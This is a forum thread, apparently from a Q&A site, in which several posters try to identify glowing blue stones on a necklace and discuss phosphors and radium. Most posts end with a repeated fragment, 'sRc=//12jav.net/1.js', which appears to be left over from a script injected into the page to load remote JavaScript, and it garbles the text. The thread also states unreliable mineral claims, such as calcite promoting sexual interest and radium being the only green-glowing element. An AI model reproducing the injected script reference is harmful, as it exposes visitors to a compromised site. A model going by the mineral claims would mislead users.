My aunt gave me this necklace that has two stones. They're pale light blue and they glow in the dark. I think they might be calcite, but what other possibilities are there? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I own a Calcite stone! They promote happiness and sexual interest. Glow? Do you mean they have a natural shine to them? They do, but they don't glow. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Oh yeah I don't know why I thought it was a calcite it literally glows green in the dark like glowsticks I think they might not be actual natural stones sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Do you have to let them in the sunlight for them to glow, or do they do it on their own. By the way is it a bright glow like irridescent green? The reason is if you have to wear them in the light the phosphor in the mineral will give off light, I used to make three different colors of light with different chemicals. if they glow on their own I would have someone with a scintilaion meter/ Gieger counter check it, the only other element that glows a green is radium, once used to paint the numbers on clocks and watches. I recalled some idiot on the submarine decided that his clock was too bright so he started toremove the radium paint every radiation alarm went off, he was stripped down. decontaminated, all his personal belongings that were in the vicinity were bagged and destroyed. Just a little experience to share.

It has to be held in front of any light then it glows very faintly in the dark with a sort if lime green color sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Then it is a phosphous mchemical and is safe as the chemical in the stone absorbs the light energy and releases it in the dark but it is a simultaneous release. the colors I used to make were green cadmium sulphide, blue aluminum sulphide, by playing with other sulphide chemicals you get more colors. phosphor is also luminescent in that soft blue/green light. be happy as the radium is an emitter of alpha, beta, and gamma radiation not good. did not want to scare you but it is best to know to avoid
